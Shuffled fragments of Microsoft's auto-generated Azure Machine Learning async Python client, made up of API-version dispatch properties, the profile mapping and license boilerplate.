:class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute') if api_version == '2021-10-01':", "== '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass else: raise ValueError(\"API version {}", "does not have operation group 'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version =", "ValueError(\"API version {} does not have operation group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "with all of the Azure clouds (Azure Stack, Azure Government, Azure China, etc.).", "on the API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version = self._get_api_version('dataset_versions') if api_version", "Deserializer(self._models_dict(api_version))) @property def experiments(self): \"\"\"Instance depends on the API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>`", "the API version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\"", "operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance depends", "import RunsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0': from ..registry_discovery.aio.operations import", "operation group 'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance depends", "{} does not have operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass else:", "version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version = self._get_api_version('async_operations') if api_version == 'v1.0': from", "self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0': from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass else: raise", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'component_containers'\".format(api_version)) return", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'assets'\".format(api_version))", "if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass else: raise ValueError(\"API", "api_version == 'v1.0': from ..runhistory.aio.operations import RunOperations as OperationClass else: raise ValueError(\"API version", "@property def private_link_resources(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` *", "import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as", "'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2':", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_endpoints(self): \"\"\"Instance depends on the API version: *", "def __init__(self, *args, **kwargs): \"\"\"This is a fake class to support current implemetation", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "elif api_version == 'v1.0': from ..runhistory.aio.operations import DeleteOperations as OperationClass else: raise ValueError(\"API", "by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and", "..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass else: raise", "have operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def operations(self): \"\"\"Instance", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance depends on the API version:", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance depends on the API", "API version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers') if", "self._get_api_version('workspace_features') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version", "self._get_api_version('component_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass elif api_version", "depends on the API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run') if", "self._get_api_version('code_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass elif api_version", "* 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections')", ":class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers') if api_version == '2021-10-01': from", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import JobsOperations as OperationClass elif api_version ==", "operation group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance depends", ":class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = self._get_api_version('data_versions') if api_version == '2022-02-01-preview': from", ":class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass elif", "def runs(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version", "an operation group and its API version. The api-version parameter sets the default", "2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = self._get_api_version('online_endpoints') if api_version == '2021-10-01':", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass else: raise ValueError(\"API", "from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass else: raise ValueError(\"API version {} does not", "api_version == 'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass else: raise ValueError(\"API version", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass elif api_version ==", "import models return models elif api_version == '2022-05-01': from ..v2022_05_01 import models return", "'v1.0': from ..runhistory.aio.operations import RunOperations as OperationClass else: raise ValueError(\"API version {} does", "= self._get_api_version('environment_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass elif", "does not have operation group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations", "'1.0.0': from ..model_dataplane.aio.operations import AssetsOperations as OperationClass else: raise ValueError(\"API version {} does", "== 'v1.0': from ..runhistory.aio.operations import DeleteOperations as OperationClass else: raise ValueError(\"API version {}", "from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass else: raise ValueError(\"API version {} does not", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "'1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0',", "DatastoresOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version ==", "== '1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass else: raise ValueError(\"API version {}", "API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version", "raise ValueError(\"API version {} does not have operation group 'assets'\".format(api_version)) return OperationClass(self._client, self._config,", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` *", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import Operations as OperationClass else: raise", "\"\"\" api_version = self._get_api_version('batch_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations as", "the API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` *", "depends on the API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = self._get_api_version('data_container') if", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass elif api_version ==", "'2021-10-01': from ..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass else: raise ValueError(\"API version {} does", ":class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers') if api_version == '2021-10-01': from", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-01-01-preview':", "Deserializer, Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from azure.core.credentials", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance depends on the API version:", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass elif", "\"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2')", "and its API version. The api-version parameter sets the default API version if", "from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "* 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\"", "from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "the API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = self._get_api_version('data_container') if api_version ==", "'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance depends on the", "not have operation group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self):", "1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version = self._get_api_version('datasets_v1') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import", "Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>`", ":class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = self._get_api_version('data_container') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations", "Operations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import Operations as OperationClass", "if api_version == 'v1.0': from ..runhistory.aio.operations import EventsOperations as OperationClass else: raise ValueError(\"API", "* 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs') if api_version ==", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-05-01': from", "raise ValueError(\"API version {} does not have operation group 'spans'\".format(api_version)) return OperationClass(self._client, self._config,", "does not have operation group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` *", "api_version = self._get_api_version('runs') if api_version == 'v1.0': from ..runhistory.aio.operations import RunsOperations as OperationClass", "not have operation group 'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self):", "operation group 'component_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance depends", "as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass elif", "'2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass else: raise ValueError(\"API version {} does", "version {} does not have operation group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "(c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See", "raise ValueError(\"API version {} does not have operation group 'run'\".format(api_version)) return OperationClass(self._client, self._config,", "self._get_api_version('run_artifacts') if api_version == 'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass else: raise", "== '2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass else: raise ValueError(\"API version {}", "* 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas')", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance depends on the API", ":class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores') if api_version == '2021-10-01': from", "* 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` *", "from ..dataset_dataplane import models return models elif api_version == '1.0.0': from ..model_dataplane import", "version {} does not have operation group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass else: raise ValueError(\"API version {} does", "\"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2')", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance depends on the API version:", "* 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version = self._get_api_version('dataset_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "ready contains multiple API versions, to help you deal with all of the", "environment_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>`", ":class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchDeploymentsOperations", "BatchEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "\"\"\" api_version = self._get_api_version('model_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations as", "self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile ) @classmethod def _models_dict(cls,", "operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance depends", "{} does not have operation group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async", "{} does not have operation group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def models(self): \"\"\"Instance depends on the API version: *", "For production, you should stick to a particular api-version and/or profile. The profile", "'2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "* v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0': from ..registry_discovery.aio.operations", "== 'v1.0': from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass else: raise ValueError(\"API version {}", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'batch_endpoints'\".format(api_version))", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'usages'\".format(api_version)) return", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'dataset_controller_v2'\".format(api_version)) return", "\"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default, **kwargs # type: Any ) -> None: self._config", "for LRO operations if no Retry-After header is present. \"\"\" DEFAULT_API_VERSION = '2022-05-01'", ":class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass elif api_version ==", "the API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans') if api_version ==", "* 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version == '1.5.0': from ..dataset_dataplane", "import ModelContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations as", "does not have operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "between an operation group and its API version. The api-version parameter sets the", "group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance depends on", "Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance depends on the API version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>`", "version if the operation group is not described in the profile. :param credential:", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version ==", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance depends on the API version: *", "ModelVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass", "run(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version =", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "def workspace_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview:", "DataContainerOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): \"\"\"Instance depends on the API version:", "CodeContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass", "= self._get_api_version('data_call') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass else:", "= '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION, 'assets':", "if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass elif api_version ==", "@property def environment_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` *", "* 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = self._get_api_version('online_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "in the project root for # license information. # # Code generated by", "2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages') if", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'dataset_containers'\".format(api_version)) return", "* 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections') if api_version ==", "* 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations", "from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "{} does not have operation group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self): 